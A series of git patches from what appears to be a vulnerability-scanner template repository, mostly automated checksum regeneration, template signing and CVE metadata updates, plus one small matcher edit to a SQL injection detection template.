http/cves/2024/CVE-2024-5910.yaml http/exposed-panels/paloalto-expedition-panel.yaml http/exposed-panels/traccar-panel.yaml http/exposed-panels/txadmin-panel.yaml +http/exposed-panels/veritas-netbackup-panel.yaml http/exposed-panels/vmware-aria-panel.yaml http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml From 72236aefef3a9da0f204e9add2dd4970b1e9a1c7 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:47:41 +0000 Subject: [PATCH 101/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2996370f0..650c57bf26 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5173,6 +5173,7 @@ http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688 http/exposed-panels/veeam-backup-gcp.yaml:aab3a1d4ae28dcf4b95489527150abf7a4fe0a13 http/exposed-panels/veeam-backup-manager-login.yaml:61c42ca2d709d88a6a251af450c32a104f31e4d0 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 +http/exposed-panels/veritas-netbackup-panel.yaml:2879d0768321b1b4b25d621b9c93fb8e41c6b3ec http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c http/exposed-panels/verizon-router-panel.yaml:00f0e5b59dcdf35b9189083bb937f08b2f7f2eaf http/exposed-panels/versa/versa-director-login.yaml:47ffd24a1f341115a7fdaba21247cec54c2d36d1 @@ -7385,6 +7386,7 @@ http/takeovers/wufoo-takeover.yaml:c1c249c1e3c0063ec554758226124e79690f0203 http/takeovers/zendesk-takeover.yaml:07d1b4e0c335df7286a7ded110889241922db44d http/technologies/4D-detect.yaml:a995aa1b0b3b6761e5e90deb18a96d57494bb9be http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f +http/technologies/accellion-detect.yaml:d21f18d05ebae85697dafd37869645c5596606a0 http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 http/technologies/activecollab-detect.yaml:8b9ebce3700960b0e8eac3b5f328117f9ac1b9fe http/technologies/adfs-detect.yaml:c6cdb0d6cd9a83ffb3031fa3c516db8754023aa2 @@ -7711,6 +7713,7 @@ http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28 http/technologies/oracle/oracle-dbcs.yaml:e78c33ba82de173522e2177e94b59a1d3cd47bd6 http/technologies/oracle/oracle-iplanet-web-server.yaml:c8e44527ca1e4cbeb8bc3b1edb60290f7d8dbb0d http/technologies/oracle/oracle-webcenter-sites.yaml:c7a9b11e4d45b1cab8351c0ee44a846023b5709f +http/technologies/oracle-fusion-detect.yaml:70e6adbea2ea3330ad37adc4afe139ee27784fc0 http/technologies/oracle-httpserver-12c.yaml:b0764e65825e393276257c9643fb8866ce0249d5 http/technologies/orbit-telephone-detect.yaml:3899085ee5a2199f71c37bb9dffe78d55d128138 http/technologies/osquery-fleet-detect.yaml:d187b3e01db1fde4a6e3d40ced5c3b348f3fa73f @@ -9467,7 +9470,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3d37c100d04a4f818d698f72f8bc953188a36426 +templates-checksum.txt:455ff9788ceaf9f9f2b79929e5a286afaa6b9502 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d33553146a414e71be8d3693924406a6dfe165fa Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:47:43 +0000 Subject: [PATCH 102/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-44349.yaml | 3 +-- http/cves/2024/CVE-2024-5910.yaml | 3 +-- http/exposed-panels/paloalto-expedition-panel.yaml | 3 +-- http/exposed-panels/vmware-aria-panel.yaml | 2 ++ 4 files changed, 5 insertions(+), 6 deletions(-) diff --git a/http/cves/2024/CVE-2024-44349.yaml b/http/cves/2024/CVE-2024-44349.yaml index 22401fb6da..fc294503c0 100644 --- a/http/cves/2024/CVE-2024-44349.yaml +++ b/http/cves/2024/CVE-2024-44349.yaml @@ -67,5 +67,4 @@ http: part: body words: - 'Conversion failed when converting the nvarchar value 'Microsoft SQL Server' - -# digest: 490a004630440220494cf226a8ede120de5770ad2cb5120ab74b57ed72e5b5156ec35b505221d82502205a72bd99bc311854a67d74828dc4230a79e3484314150c73e525bd55d716ec7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a5bc70a82453302b02d97fb6b99d6a726505ee73b0815574e381ac7224c09050221008795017bf36669ad6b978ae76fd3ff3868aea81a23c27898e0436cc657b7e0e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5910.yaml b/http/cves/2024/CVE-2024-5910.yaml index 043c96a2da..df683f1a75 100644 --- a/http/cves/2024/CVE-2024-5910.yaml +++ b/http/cves/2024/CVE-2024-5910.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022071a1326369af86704b22d29964826646297ccc20788847b1d4ad87efa0b2b1a2022048bf1c997f47900620775ca83cdf9f7655ff7c13fba970af65d01b30eb099141:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae2af8d3f22acde5d02c660aec9cef1d74a0d99f0b3e920c76a31a3efadbf86a022100f1a5128a2ec167051d28fa1c8b018e8ce88fde39ec5efdaeaa4baf88b5422e87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/paloalto-expedition-panel.yaml b/http/exposed-panels/paloalto-expedition-panel.yaml index 2239d5963a..e034acb3c7 100644 --- a/http/exposed-panels/paloalto-expedition-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-panel.yaml @@ -32,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220639bf929eb096fc1fdcb510e30759eb3554b84d5b8122224a9e744381001a75f022100c9bcb971a1a1541558000f2efebac25102767b75e342e8e9a32f20d1498e02f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220464a85e29e781c5ebe163238c1bf92060d051c3c5c0260befac61260f4b12c0f022060ffaa59b2b7309e20ea17adb3b34c85e8696fbe99f569042a1f2b2949671916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vmware-aria-panel.yaml b/http/exposed-panels/vmware-aria-panel.yaml index 5acbbbc116..3afbb4c8c7 100644 --- a/http/exposed-panels/vmware-aria-panel.yaml +++ b/http/exposed-panels/vmware-aria-panel.yaml @@ -27,3 +27,5 @@ http: - type: status status: - 200 + +# digest: 4a0a004730450221008214823f2bdf5832cc542e525b02c48522b949520717ce079fa0509b9b2a119e02204eb1c16f6d1617cdde37cf130b786dfaae3206e6d51dc88ab8dc6a04d34dbad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cf4169a07a2704da7eb89d3172be719f9531aa47 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Oct 2024 11:48:51 +0400 Subject: [PATCH 103/218] Update yonyou-u8-crm-tb-sqli.yaml --- http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml index e57c5046e1..9b6210efd6 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml @@ -1,7 +1,7 @@ id: yonyou-u8-crm-tb-sqli info: - name: UFIDA U8 CRM fillbacksetting.php - Time Based SQL Injection + name: UFIDA U8 CRM fillbacksetting.php - SQL Injection author: s4e-io severity: high description: | @@ -26,6 +26,6 @@ http: - type: dsl dsl: - 'duration>=6' - - 'contains(body, "success\":true")' + - 'contains(body, "{\"success\":true}")' - 'status_code == 200' condition: and From 0c92c42c4584978786522dbede396d7aaf0a7e82 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:49:21 +0000 Subject: [PATCH 104/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index df3a909fc4..bdcafd646c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2024/CVE-2024-39713.yaml +http/cves/2024/CVE-2024-43360.yaml http/cves/2024/CVE-2024-44349.yaml http/cves/2024/CVE-2024-5910.yaml http/exposed-panels/paloalto-expedition-panel.yaml From 22f09d374621dabfa7b8c50ddcecd423a01d35e6 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:49:24 +0000 Subject: [PATCH 105/218] =?UTF-8?q?chore:=20generate=20CVEs=20metadata=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index fa27ab3acb..0b007b07d0 100644 --- a/cves.json +++ b/cves.json @@ -2588,6 +2588,7 @@ {"ID":"CVE-2024-4257","Info":{"Name":"BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-4257.yaml"} {"ID":"CVE-2024-4295","Info":{"Name":"Email Subscribers by Icegram Express \u003c= 5.7.20 - Unauthenticated SQL Injection via Hash","Severity":"critical","Description":"Email Subscribers by Icegram Express \u003c= 5.7.20 contains an unauthenticated SQL injection vulnerability via the hash parameter.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4295.yaml"} {"ID":"CVE-2024-43160","Info":{"Name":"BerqWP \u003c= 1.7.6 - Arbitrary File Uplaod","Severity":"critical","Description":"The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-43160.yaml"} +{"ID":"CVE-2024-43360","Info":{"Name":"ZoneMinder - SQL Injection","Severity":"critical","Description":"ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43360.yaml"} {"ID":"CVE-2024-43425","Info":{"Name":"Moodle - Remote Code Execution","Severity":"critical","Description":"Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-43425.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} {"ID":"CVE-2024-4358","Info":{"Name":"Progress Telerik Report Server - Authentication Bypass","Severity":"critical","Description":"In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4358.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 339c849c3a..ec4df3c192 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -97de10c8b3d0e3d24e2116fd3e68a356 +799eae8299d198bbf2b788fdf706af03 From db97af93906f8fe92702739a0ae1c71f362d80e9 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:49:26 +0000 Subject: [PATCH 106/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 650c57bf26..5c72780367 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3808,13 +3808,14 @@ http/cves/2024/CVE-2024-41955.yaml:226ee0e7732a2e17b312776ac8c020ca60dad2e3 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-43160.yaml:d5baeeff92f97904c3b6202e25f3160dfa6d4111 +http/cves/2024/CVE-2024-43360.yaml:5c612893ecb5ed6e79a9683fb24b5d2150e4b7b9 http/cves/2024/CVE-2024-43425.yaml:c5d55fa9159426dcb15d374d7c51b13a1050e71d http/cves/2024/CVE-2024-4348.yaml:b875149da3d86eb5be674c5f5e93606f3d448a06 http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f http/cves/2024/CVE-2024-43917.yaml:8feef564db794f7d2b90a4dd9aa7355697ea73aa http/cves/2024/CVE-2024-44000.yaml:da1f708dc158096fe8c628af6e36b51e21958ebb http/cves/2024/CVE-2024-4434.yaml:597591d430f802f75a17c2c04ae3aee6dcf392de -http/cves/2024/CVE-2024-44349.yaml:db54b5e7a9ed248fdc9bf0c763096ebf0b10c10e +http/cves/2024/CVE-2024-44349.yaml:87dce5297e2e20337d4193bc5cf64ae3099a9810 http/cves/2024/CVE-2024-4443.yaml:d23e057ea00b1051ec865516a6e246c71ddf420b http/cves/2024/CVE-2024-44849.yaml:9ca7cec952e5f2f8cbfa8e76fc365d8f03f84dac http/cves/2024/CVE-2024-45195.yaml:331e8730b2a9485b6a15057b67ce083f07c264a4 @@ -3843,7 +3844,7 @@ http/cves/2024/CVE-2024-5488.yaml:7d9ad7b220289088483a190e02e00798e0abe138 http/cves/2024/CVE-2024-5522.yaml:4ead21579625d4141e498a5837a73a31b2b99b25 http/cves/2024/CVE-2024-5765.yaml:487b5d32da8c2a9405653daab7369763cf83830e http/cves/2024/CVE-2024-5827.yaml:c8c798630092a11d237eba98e68105f7ddb8cc02 -http/cves/2024/CVE-2024-5910.yaml:57d778e9f8715b05b670f6d36aefb752849f1cd8 +http/cves/2024/CVE-2024-5910.yaml:cab168cead701596d134d1a2a40f96fb5693abf7 http/cves/2024/CVE-2024-5932.yaml:2c58bd22878f10edce95bb47ae01405f95382466 http/cves/2024/CVE-2024-5936.yaml:972f0727571f647e196b34f205727a958b1d6bee http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -4869,7 +4870,7 @@ http/exposed-panels/pacs-connexion-utilisateur.yaml:b76d85aa17275933bfee31bd63d6 http/exposed-panels/pagespeed-global-admin.yaml:96c612151fc6efa226c0ebbf6d440609dba39ff7 http/exposed-panels/pahtool-panel.yaml:4fbe84f98073f39239a3ef4b5c63000955a76f1b http/exposed-panels/pairdrop-panel.yaml:d31c93fc22266632f7deeabf02df44b3a9310ad4 -http/exposed-panels/paloalto-expedition-panel.yaml:153ed7214b6e85208b1e192651210723a004e1b3 +http/exposed-panels/paloalto-expedition-panel.yaml:b6060b0d84d547496845aadc358603c346e018bf http/exposed-panels/panabit-panel.yaml:74efa0bec17bcad5eb702fadc11ccf8517d2e976 http/exposed-panels/pandora-fms-console.yaml:54f725d5b05ecaf74ebe03e10864483fd881dcda http/exposed-panels/papercut-ng-panel.yaml:775834276ae27186fae347b6d1700c02bc8fc0c7 @@ -5186,7 +5187,7 @@ http/exposed-panels/vinchin-panel.yaml:f4b751e19d3f8b5981c1b0ef89264e5ecadb270d http/exposed-panels/virtua-software-panel.yaml:bc0229998feb2dad214b820e76c0e21fa597f3a9 http/exposed-panels/virtual-ema-detect.yaml:02b9fdcff2c9183effa7675ef1e9b18df5c9e918 http/exposed-panels/vistaweb-panel.yaml:2da7f46b0a5a4865a3fb2c9019c3006ad478e70b -http/exposed-panels/vmware-aria-panel.yaml:c732cdc26055517b6db77c45e6d4dae47223c38b +http/exposed-panels/vmware-aria-panel.yaml:4a5f39d3c379cbd58bc564154a996a55e688de58 http/exposed-panels/vmware-carbon-black-edr.yaml:c245a504fbf899a1727ed03088d0576cf72325db http/exposed-panels/vmware-cloud-availability.yaml:fce792d6709e97901eebc7fb2c99d6cda2bcc1e0 http/exposed-panels/vmware-cloud-director.yaml:57d1162f8d7d561f47e734ff576bbc0b69d6f76f @@ -9470,7 +9471,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:455ff9788ceaf9f9f2b79929e5a286afaa6b9502 +templates-checksum.txt:5059230afa0b4592bc5979eb90f86864b365d423 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f2221f1e46f4e9c0258b5ea929a55803782fd19d Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:50:53 +0000 Subject: [PATCH 107/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-43360.yaml | 2 ++ http/exposed-panels/veritas-netbackup-panel.yaml | 2 ++ http/exposed-panels/vmware-aria-panel.yaml | 5 ++--- http/technologies/accellion-detect.yaml | 2 ++ http/technologies/oracle-fusion-detect.yaml | 2 ++ 5 files changed, 10 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-43360.yaml b/http/cves/2024/CVE-2024-43360.yaml index 2ddfc648cf..b63eeb6dc1 100644 --- a/http/cves/2024/CVE-2024-43360.yaml +++ b/http/cves/2024/CVE-2024-43360.yaml @@ -41,3 +41,5 @@ http: - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and + +# digest: 4b0a00483046022100ce6e40553c3349c94d9cb312e4d6dc3e61ef6f7841ddfdea24a850f398eb9a560221008b3f432c85e96060b42aa047cc8ac87d6ee6b3618f258a0b1682c185f068bca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/veritas-netbackup-panel.yaml b/http/exposed-panels/veritas-netbackup-panel.yaml index b90bf8aff9..72fa69aa52 100644 --- a/http/exposed-panels/veritas-netbackup-panel.yaml +++ b/http/exposed-panels/veritas-netbackup-panel.yaml @@ -29,3 +29,5 @@ http: - type: status status: - 200 + +# digest: 4b0a00483046022100bbe69cde0f6acbc2464d3885683f90d4694eb3fc3a23b14345fda74bb593008a022100d0996a483f798f124cbe14266c8f50e7f3496435bd1e39c6ba6241d4101fd7bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vmware-aria-panel.yaml b/http/exposed-panels/vmware-aria-panel.yaml index 3afbb4c8c7..861b8ea2eb 100644 --- a/http/exposed-panels/vmware-aria-panel.yaml +++ b/http/exposed-panels/vmware-aria-panel.yaml @@ -26,6 +26,5 @@ http: - type: status status: - - 200 - -# digest: 4a0a004730450221008214823f2bdf5832cc542e525b02c48522b949520717ce079fa0509b9b2a119e02204eb1c16f6d1617cdde37cf130b786dfaae3206e6d51dc88ab8dc6a04d34dbad8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - 200 +# digest: 4b0a00483046022100e968abbe5d43bf338a4dddf66c240b564e27097fd7d2d56d0ab8612e79ff6349022100f106a47b7722e502490502de78653961e81b7c147d25aa2ecc980be3c122fa4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/accellion-detect.yaml b/http/technologies/accellion-detect.yaml index 78bbcc9c06..27ad17a0f1 100644 --- a/http/technologies/accellion-detect.yaml +++ b/http/technologies/accellion-detect.yaml @@ -29,3 +29,5 @@ http: - type: status status: - 200 + +# digest: 490a004630440220528d2b4b6595f7c7c7ec9e565d94da87a9e120afdb6e63823c94f91c43a77deb0220404f2e903aaeaeb082f0706b08bb5f49202e5583e7d6f3da92997b41af7d84e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/oracle-fusion-detect.yaml b/http/technologies/oracle-fusion-detect.yaml index 859145955a..ed217d927d 100644 --- a/http/technologies/oracle-fusion-detect.yaml +++ b/http/technologies/oracle-fusion-detect.yaml @@ -27,3 +27,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022100c4c246e35f687de0b355e79639309d781ca959d35ce0538ecd0e8de148336ce702206b46bfc8c2f1939fb037a67375b7b420d71063bccd2b6b4e6e49e957db2609de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 338e50688669c80b09fefeecee2a8a488c05c3fd Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:57:15 +0000 Subject: [PATCH 108/218] =?UTF-8?q?chore:=20generate=20new=20addition=20li?= =?UTF-8?q?st=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index bdcafd646c..559abe7024 100644 --- a/.new-additions +++ b/.new-additions @@ -11,3 +11,4 @@ http/technologies/accellion-detect.yaml http/technologies/mirth-connect-detect.yaml http/technologies/oracle-fusion-detect.yaml http/technologies/wordpress/plugins/burst-statistics.yaml +http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml From 0d5b46455715859ea6b044f6e41e5f61833f5d76 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Tue, 15 Oct 2024 07:57:36 +0000 Subject: [PATCH 109/218] =?UTF-8?q?chore:=20generate=20templates=20checksu?= =?UTF-8?q?m=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- templates-checksum.txt | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5c72780367..c5e981bfa4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -418,8 +418,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:a192b85fc80dc6835f45f27564e5f47c9858b351 -cves.json-checksum.txt:1e98d5ecc15aadd66ec27706442d35f880250ef2 +cves.json:f8872cbec5da5f5fbb3c312cf5865d9eae0a3370 +cves.json-checksum.txt:796a759736dffb34602155821522d3c02a8d3c4b dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3808,7 +3808,7 @@ http/cves/2024/CVE-2024-41955.yaml:226ee0e7732a2e17b312776ac8c020ca60dad2e3 http/cves/2024/CVE-2024-4257.yaml:76768a186c284a20129bc8f67a2c620f8c1fc7ac http/cves/2024/CVE-2024-4295.yaml:7c3e58627bc8d2cfbeba41d4e5b02805b06aac35 http/cves/2024/CVE-2024-43160.yaml:d5baeeff92f97904c3b6202e25f3160dfa6d4111 -http/cves/2024/CVE-2024-43360.yaml:5c612893ecb5ed6e79a9683fb24b5d2150e4b7b9 +http/cves/2024/CVE-2024-43360.yaml:92e96f83e19172be9f5c21ee711d6ea4b68b8946 http/cves/2024/CVE-2024-43425.yaml:c5d55fa9159426dcb15d374d7c51b13a1050e71d http/cves/2024/CVE-2024-4348.yaml:b875149da3d86eb5be674c5f5e93606f3d448a06 http/cves/2024/CVE-2024-4358.yaml:13a3a1250e1529ffc91043931bb2fc322998103f @@ -5174,7 +5174,7 @@ http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688 http/exposed-panels/veeam-backup-gcp.yaml:aab3a1d4ae28dcf4b95489527150abf7a4fe0a13 http/exposed-panels/veeam-backup-manager-login.yaml:61c42ca2d709d88a6a251af450c32a104f31e4d0 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 -http/exposed-panels/veritas-netbackup-panel.yaml:2879d0768321b1b4b25d621b9c93fb8e41c6b3ec +http/exposed-panels/veritas-netbackup-panel.yaml:3800cdd0bf4c67de52c9e499f28dda930a6fda18 http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c http/exposed-panels/verizon-router-panel.yaml:00f0e5b59dcdf35b9189083bb937f08b2f7f2eaf http/exposed-panels/versa/versa-director-login.yaml:47ffd24a1f341115a7fdaba21247cec54c2d36d1 @@ -5187,7 +5187,7 @@ http/exposed-panels/vinchin-panel.yaml:f4b751e19d3f8b5981c1b0ef89264e5ecadb270d http/exposed-panels/virtua-software-panel.yaml:bc0229998feb2dad214b820e76c0e21fa597f3a9 http/exposed-panels/virtual-ema-detect.yaml:02b9fdcff2c9183effa7675ef1e9b18df5c9e918 http/exposed-panels/vistaweb-panel.yaml:2da7f46b0a5a4865a3fb2c9019c3006ad478e70b -http/exposed-panels/vmware-aria-panel.yaml:4a5f39d3c379cbd58bc564154a996a55e688de58 +http/exposed-panels/vmware-aria-panel.yaml:7ec5e64e8c5b9b287e646c05b07aff203077fa53 http/exposed-panels/vmware-carbon-black-edr.yaml:c245a504fbf899a1727ed03088d0576cf72325db http/exposed-panels/vmware-cloud-availability.yaml:fce792d6709e97901eebc7fb2c99d6cda2bcc1e0 http/exposed-panels/vmware-cloud-director.yaml:57d1162f8d7d561f47e734ff576bbc0b69d6f76f @@ -7387,7 +7387,7 @@ http/takeovers/wufoo-takeover.yaml:c1c249c1e3c0063ec554758226124e79690f0203 http/takeovers/zendesk-takeover.yaml:07d1b4e0c335df7286a7ded110889241922db44d http/technologies/4D-detect.yaml:a995aa1b0b3b6761e5e90deb18a96d57494bb9be http/technologies/abyss-web-server.yaml:2fffb4cde6c7f55d76d6e75695407b177e97455f -http/technologies/accellion-detect.yaml:d21f18d05ebae85697dafd37869645c5596606a0 +http/technologies/accellion-detect.yaml:da043d27e8aa6996c6a002ba059ea3a45052f1b5 http/technologies/acontent-detect.yaml:3a895300f93df22d858994bf6851a82f9d38c7d9 http/technologies/activecollab-detect.yaml:8b9ebce3700960b0e8eac3b5f328117f9ac1b9fe http/technologies/adfs-detect.yaml:c6cdb0d6cd9a83ffb3031fa3c516db8754023aa2 @@ -7714,7 +7714,7 @@ http/technologies/oracle/oracle-dbass-detect.yaml:b8eb13459d727a34bde146f1265c28 http/technologies/oracle/oracle-dbcs.yaml:e78c33ba82de173522e2177e94b59a1d3cd47bd6 http/technologies/oracle/oracle-iplanet-web-server.yaml:c8e44527ca1e4cbeb8bc3b1edb60290f7d8dbb0d 